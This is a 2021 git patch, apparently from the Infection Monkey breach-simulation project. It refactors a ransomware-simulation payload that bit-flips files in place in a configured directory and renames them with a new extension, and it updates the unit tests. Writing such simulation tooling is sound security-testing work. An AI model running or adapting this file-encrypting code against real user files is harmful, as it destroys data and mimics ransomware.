From 97cf19896509b777213e33555873951657d469d1 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Wed, 23 Jun 2021 10:50:14 -0400 Subject: [PATCH] agent: Narrow the responsibilities of RansomwareBitflipEncryptor --- .../ransomware_bitflip_encryptor.py | 22 +------ .../ransomware/ransomware_payload.py | 26 +++++++- .../test_ransomware_bitflip_encryptor.py | 63 ++++++------------- 3 files changed, 44 insertions(+), 67 deletions(-) diff --git a/monkey/infection_monkey/ransomware/ransomware_bitflip_encryptor.py b/monkey/infection_monkey/ransomware/ransomware_bitflip_encryptor.py index e882e2775..4c297d4cb 100644 --- a/monkey/infection_monkey/ransomware/ransomware_bitflip_encryptor.py +++ b/monkey/infection_monkey/ransomware/ransomware_bitflip_encryptor.py @@ -1,31 +1,13 @@ from pathlib import Path -from typing import List, Optional, Tuple from infection_monkey.utils import bit_manipulators class RansomwareBitflipEncryptor: - def __init__(self, new_file_extension, chunk_size=64): - self._new_file_extension = new_file_extension + def __init__(self, chunk_size=64): self._chunk_size = chunk_size - def _add_extension(self, filepath: Path): - new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}") - filepath.rename(new_filepath) - - def encrypt_files(self, file_list: List[Path]) -> List[Tuple[Path, Optional[Exception]]]: - results = [] - for filepath in file_list: - try: - self._encrypt_single_file_in_place(filepath) - self._add_extension(filepath) - results.append((filepath, None)) - except Exception as ex: - results.append((filepath, ex)) - - return results - - def _encrypt_single_file_in_place(self, filepath: Path): + def encrypt_file_in_place(self, filepath: Path): with open(filepath, "rb+") as f: data = f.read(self._chunk_size) while data: diff --git a/monkey/infection_monkey/ransomware/ransomware_payload.py b/monkey/infection_monkey/ransomware/ransomware_payload.py index b25297d9c..5a4c6b412 100644 --- a/monkey/infection_monkey/ransomware/ransomware_payload.py +++ b/monkey/infection_monkey/ransomware/ransomware_payload.py @@ -1,5 +1,6 @@ import logging from pathlib import Path +from typing import List, Optional, Tuple from infection_monkey.ransomware.ransomware_bitflip_encryptor import RansomwareBitflipEncryptor from infection_monkey.ransomware.valid_file_extensions import VALID_FILE_EXTENSIONS_FOR_ENCRYPTION @@ -24,13 +25,16 @@ class RansomewarePayload: LOG.info(f"Linux dir configured for encryption is \"{config['linux_dir']}\"") self._target_dir = config["windows_dir"] if is_windows_os() else config["linux_dir"] + + self._new_file_extension = EXTENSION self._valid_file_extensions_for_encryption = VALID_FILE_EXTENSIONS_FOR_ENCRYPTION.copy() - self._valid_file_extensions_for_encryption.discard(EXTENSION) - self._encryptor = RansomwareBitflipEncryptor(EXTENSION, chunk_size=CHUNK_SIZE) + self._valid_file_extensions_for_encryption.discard(self._new_file_extension) + + self._encryptor = RansomwareBitflipEncryptor(chunk_size=CHUNK_SIZE) def run_payload(self): file_list = self._find_files() - self._encryptor.encrypt_files(file_list) + self._encrypt_files(file_list) def _find_files(self): if not self._target_dir: @@ -44,3 +48,19 @@ class RansomewarePayload: all_files = get_all_regular_files_in_directory(Path(self._target_dir)) return filter_files(all_files, file_filters) + + def _encrypt_files(self, file_list: List[Path]) -> List[Tuple[Path, Optional[Exception]]]: + results = [] + for filepath in file_list: + try: + self._encryptor.encrypt_file_in_place(filepath) + self._add_extension(filepath) + results.append((filepath, None)) + except Exception as ex: + results.append((filepath, ex)) + + return results + + def _add_extension(self, filepath: Path): + new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}") + filepath.rename(new_filepath) diff --git a/monkey/tests/unit_tests/infection_monkey/ransomware/test_ransomware_bitflip_encryptor.py b/monkey/tests/unit_tests/infection_monkey/ransomware/test_ransomware_bitflip_encryptor.py index 9656bb671..5dd584778 100644 --- a/monkey/tests/unit_tests/infection_monkey/ransomware/test_ransomware_bitflip_encryptor.py +++ b/monkey/tests/unit_tests/infection_monkey/ransomware/test_ransomware_bitflip_encryptor.py @@ -1,7 +1,6 @@ +import os + from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import ( - ALL_ZEROS_PDF, - ALL_ZEROS_PDF_CLEARTEXT_SHA256, - ALL_ZEROS_PDF_ENCRYPTED_SHA256, TEST_KEYBOARD_TXT, TEST_KEYBOARD_TXT_CLEARTEXT_SHA256, TEST_KEYBOARD_TXT_ENCRYPTED_SHA256, @@ -10,50 +9,26 @@ from tests.utils import hash_file from infection_monkey.ransomware.ransomware_bitflip_encryptor import RansomwareBitflipEncryptor -EXTENSION = ".new" + +def test_file_encrypted(ransomware_target): + test_keyboard = ransomware_target / TEST_KEYBOARD_TXT + + assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256 + + encryptor = RansomwareBitflipEncryptor(chunk_size=64) + encryptor.encrypt_file_in_place(test_keyboard) + + assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256 -def with_extension(filename): - return f"{filename}{EXTENSION}" +def test_file_encrypted_in_place(ransomware_target): + test_keyboard = ransomware_target / TEST_KEYBOARD_TXT + expected_inode = os.stat(test_keyboard).st_ino -def test_listed_files_encrypted(ransomware_target): - orig_all_zeros = ransomware_target / ALL_ZEROS_PDF - orig_test_keyboard = ransomware_target / TEST_KEYBOARD_TXT - file_list = [orig_all_zeros, orig_test_keyboard] + encryptor = RansomwareBitflipEncryptor(chunk_size=64) + encryptor.encrypt_file_in_place(test_keyboard) - assert hash_file(file_list[0]) == ALL_ZEROS_PDF_CLEARTEXT_SHA256 - assert hash_file(file_list[1]) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256 + actual_inode = os.stat(test_keyboard).st_ino - encryptor = RansomwareBitflipEncryptor(EXTENSION) - encryptor.encrypt_files(file_list) - - assert hash_file(with_extension(orig_all_zeros)) == ALL_ZEROS_PDF_ENCRYPTED_SHA256 - assert hash_file(with_extension(orig_test_keyboard)) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256 - - -def test_encrypted_files_in_results(ransomware_target): - orig_all_zeros = ransomware_target / ALL_ZEROS_PDF - orig_test_keyboard = ransomware_target / TEST_KEYBOARD_TXT - file_list = [orig_all_zeros, orig_test_keyboard] - - encryptor = RansomwareBitflipEncryptor(EXTENSION) - results = encryptor.encrypt_files(file_list) - - assert len(results) == 2 - assert (orig_all_zeros, None) in results - assert (orig_test_keyboard, None) in results - - -def test_file_not_found(ransomware_target): - all_zeros = ransomware_target / ALL_ZEROS_PDF - file_list = [all_zeros] - - all_zeros.unlink() - - encryptor = RansomwareBitflipEncryptor(EXTENSION) - - results = encryptor.encrypt_files(file_list) - - assert len(results) == 1 - assert "No such file or directory" in str(results[0][1]) + assert expected_inode == actual_inode